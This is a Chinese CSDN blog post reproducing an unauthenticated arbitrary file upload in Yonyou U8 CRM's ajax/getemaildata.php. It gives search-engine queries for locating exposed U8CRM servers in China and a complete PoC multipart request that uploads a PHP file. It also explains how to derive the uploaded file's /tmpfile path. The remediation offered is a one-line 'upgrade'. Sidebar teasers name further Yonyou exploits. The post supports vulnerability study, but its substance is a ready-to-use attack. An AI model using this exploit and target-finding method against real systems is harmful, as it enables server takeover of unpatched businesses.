用友U8 crm客户关系管理任意文件上传漏洞

最新推荐文章于 2024-06-20 09:53:57 发布
最新推荐文章于 2024-06-20 09:53:57 发布
阅读量174 收藏
点赞数
分类专栏: 漏洞复现 文章标签: okhttp android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68647219/article/details/133638721
版权

1.简介

     工作发现,用友U8 crm客户关系管理任意文件上传该漏洞是由于ajax/getemaildata.php任意文件上传漏洞,可能导致未经身份验证的恶意攻击者可以上传恶意文件,从而获取目标服务器的控制权限。

2.资产测绘

鹰图:body="“用友U8CRM”"&&ip.country=="中国"

title="“用友U8CRM”"&&ip.country=="中国"

3.poc

POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1

Host: 

User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36

Connection: close

Content-Length: 205

Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ

Accept-Encoding: gzip, deflate

------WebKitFormBoundarykS5RKgl8t3nwInMQ

Content-Disposition: form-data; name="file"; filename="ceshi.php "

Content-Type: text/plain

<?php phpinfo()?>

------WebKitFormBoundarykS5RKgl8t3nwInMQ

得到的数字减一,8928-1

访问/tmpfile/upd8927.tmp.php

4.修复建议

升级至最新版本。。。。。。。。

朝阳挽歌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
用友畅捷通CRM存在默认空口令漏洞
nnn2188185的博客
04-23 433
用友畅捷通CRM存在默认空口令漏洞,攻击者可以利用默认口令登录网站后台,以后台权限进行敏感操作,构成信息泄露风险。
用友U8+CRM 逻辑漏洞登录后台漏洞复现
0xSec
01-06 1219
用友 U8 CRM客户关系管理系统reservationcomplete.php文件存在逻辑漏洞,未授权的攻击者通过漏洞可以直接登录后台,获取系统内部敏感信息,使系统处于极不安全状态。
用友php漏洞,用友CRM注入漏洞(无需登录通杀所有版本)
weixin_34977368的博客
04-10 1155
用友TurboCRM存在通用sql注入。http://**.**.**.**:8081/login/login.php如下图找到找回密码页访问http://**.**.**.**:8081/login/changepswd.php?orgcode=1&loginname=system输入信息抓包POST /login/changepswd.php?orgcode=1&loginna...
用友 CRM help2.php存在任意文件读取漏洞
3tefanie丶zhou的博客
12-19 682
【天底下喜欢讲道理的人,大致可以分为两种,一种是为了让自己心里好受,一种是希望让世道好过。】
【0day】复现用友CRM系统任意文件读取漏洞
记录并分享学习安全的知识点..
07-07 576
用友TurboCRM一直致力于为客户提供架构完整、功能全面、具有良好伸缩性的产品,以支持客户业务的快速变化与成长。产品信息用友TurboCRM产品线由包括支持全面客户接触的TurboCTI和用友TurboLINK,匹配多业务模式和业务管理用友TurboKEY和用友TurboCRM,支持与ERP等软件无缝联接、整合应用的用友TurboEAI,满足业务决策和商业智能应用用友TurboDSS系统构成。用友TurboCRM存在任意文件读取漏洞
用友U8 crm客户关系管理存在任意文件上传漏洞2 附POC
nnn2188185的博客
09-25 232
用友crm ajax/getemaildata.php任意文件上传漏洞
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC...漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。
用友U8启用货位管理操作步骤
08-25
本操作说明适用于用友U810.0以上版本,请注意认真阅读,特别是最后的注意事项。货位管理和批次管理相冲突,请谨慎启用,生厂制造类企业建议先模拟用友启用货位管理后再确定是否启用。
用友T6-CRM客户关系管理安装手册.pdf
07-26
该手册详细介绍了用友T6-CRM客户关系管理系统的安装过程,包括安装配置、数据库选择和系统文件安装等三个步骤。安装前需要确认安装光盘包含的内容,包括用友T6-CRM安装包、MSDE2000数据库安装包、SQL Express2005...
用友U8人力资源管理软件介绍.doc
11-16
用友U8人力资源管理软件是集成了人事管理、薪资管理、保险福利管理、考勤休假管理、人事合同管理、招聘管理、培训管理、绩效考核管理、计件工资、宿舍管理、经理自助、员工自助等多个模块的综合性软件。下面是对每个...
财税实务:用友U8软件之出纳管理步骤.pdf
11-28
财税实务:用友U8软件之出纳管理步骤.pdf
用友U8+ CRM任意文件上传任意文件读取 实战
m0_43397796的博客
02-24 2002
用友CRM系统,使用量非常广,这里存在任意文件读取漏洞任意文件上传漏洞
用友php漏洞,用友漏洞存在目录整理 | CN-SEC 中文网
weixin_34637293的博客
04-10 1254
/core/public/singleplandetail.jsp /epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V /service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_...
用友U8+ CRM任意文件上传漏洞
weixin_44304678的博客
11-02 410
用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传任意文件读取漏洞,攻击者通过漏洞可以获取到服务器权限。用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。
Ajax详解
最新发布
这河里吗l的博客
06-20 1073
Ajax 的全称是 Asynchronous Javascript And XML(异步 JavaScript 和 XML)。通俗的理解:在网页中利用 XMLHttpRequest 对象和服务器进行数据交互的方式,就是Ajax。Ajax可以实现网页与服务器之间的数据交互AJAX不是编程语言,是一种无需重新载入整个页面,能够更新部分网页的技术。
Okhttp调用第三方系统接口【随记】
weixin_64296810的博客
06-17 566
Okhttp调用第三方系统接口。对象,包含你要发送的数据。方法发送请求并获取响应。
JavaScript和promise——0_1 promise
乡亲们啊的博客
06-18 1105
天不生Promise,则JavaScript万古如长夜
前端技术栈二(promise&模块化编程)
weixin_51580177的博客
06-19 607
promise解决了代码嵌套化的问题,模块化将代码量进行了分级,
Blazor的SSR服务端渲染是不是交互式的
2401_85195613的博客
06-19 922
从.NET8开始,Blazor引入了SSR服务端渲染,归功于MVC和RazePage的沉淀,虽然来得晚,但一经发布,就将Blazor推向了新的高度。从今年开始,Youtube上关于Blazor的优质教学视频,以肉眼可见的速度在增加,说明有更多人愿意学习和传播Blazor。Vue和Nuxt.js我都有在用,技术层面,我认为完全是可以去Battle一下的。大家不要停留在BlazorWebAssembly时代,现在Blazor对标的,是Next.js、Nuxt.js。SSR的东西不多,但如果你像我一样没用...
用友u8 cloud 反序列化rce漏洞复现
12-05
用友U8 Cloud是一款企业级管理软件,但是近期被发现存在反序列化远程命令执行(RCE)漏洞。要复现这个漏洞,首先需要一个能够触发反序列化的点,比如一个可控制的对象。接下来,我们可以构造一个恶意的序列化数据,然后将这个数据传递给U8 Cloud系统,让系统进行反序列化操作。当系统对这个数据进行反序列化时,就会触发我们植入的恶意代码,从而实现远程命令执行。 为了更具体地说明这个过程,我们可以借助一个简单的例子来解释。假设我们构造了一个包含恶意命令的序列化数据,并将其发给U8 Cloud系统。系统在接收到这个数据后,会将其解析,然后执行其中的命令。这样一来,我们就成功地利用了反序列化漏洞来实现远程命令执行。 当然,为了成功复现这个漏洞,还需要一些具体的技术细节和环境配置。需要了解U8 Cloud系统的结构和漏洞的具体利用方式,还可能需要使用特定的工具来构造恶意的序列化数据。在复现过程中,一定要格外小心,确保不会对受影响的系统造成损害。同时,及时向厂商反馈该漏洞,以便及时修复和加强系统安全防护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

朝阳挽歌

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值